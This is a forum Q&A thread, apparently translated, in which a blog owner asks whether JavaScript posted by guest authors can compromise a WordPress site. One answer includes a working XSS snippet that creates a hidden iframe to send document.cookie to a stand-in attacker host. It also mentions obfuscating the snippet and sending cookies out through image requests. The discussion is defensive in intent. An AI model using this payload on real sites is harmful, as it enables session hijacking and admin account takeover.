Can a site be hacked using JS code injection?
Yes, many people say that the imagination is limitless, and that it seems possible to hack, but I don't see any ways yet, and I'm not a big expert in JS. I would like to see a specific example of hacking a site (getting access to ftp, to files, the ability to delete/create files, change permissions, etc.)
For internal organs: I am interested purely in self-defense =) I want to give the right to write articles on the blog to unfamiliar authors, that's interesting-WP skips JS fine, do something about it, or leave it that way.
3 answers
A banal example:
var i = document.createElement('iframe');
i.style='width: 1px; height: 1px; visibility: hidden;';
document.getElementsByTagName('body')[0].appendChild(i);
i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie;
Thus, the hacker Vasya Pupkin often steals the admin cookies and very quickly goes to the site with them. If the admin has the ability to edit files from the admin panel - this is full control (there are such things as phpftp and phpmyadmin)
This code can also be re-encrypted three times, so that it is an unreadable set of characters. Instead of cookies, you can simply wind up visits to another site in this way, etc.
In general, you can use js to conduct xss attacks, and if you have ajax on your site and the server part is self-written, no one rules out that this way you can somehow mess up the system; for example: you have the DeleteFileOnServer method in the ajax handler, if the rights are not checked in any way during the execution of the method, then you can imagine situations in which an attacker will form an ajax request using the DeleteFileInServer method and delete a file without having the right to do so, but in most cases in some cases, such things are tested by the developers of the web application, the rights check is performed, and so on.
Related: XSS attack technique, general words on the topic of ajax-security.
It's impossible. The maximum that can be done is to steal the cookies. And then you will not be able to send them directly (AJAX to another domain is prohibited and does not work, I personally checked it).
You will have to send images in the request, for example img.png?jesnfjkndsfjkndskjweklfngjksdngjksnjdsg - a cookie is encoded at the end. This technology, for example, is used by Yandex WebVisor web analytics (I personally watched it).
There are still nuances. JS can create text inside the page, which will then be indexed by Google. This is true-I was personally convinced by the example partner photos of the country, when the keywords pet, gift were the most frequent according to webmasters.google.com (website about the apocalypse).
Even unscrupulous authors will be able to redirect the page, make links, images, banners.
But it will be impossible to get access to ftp, to files .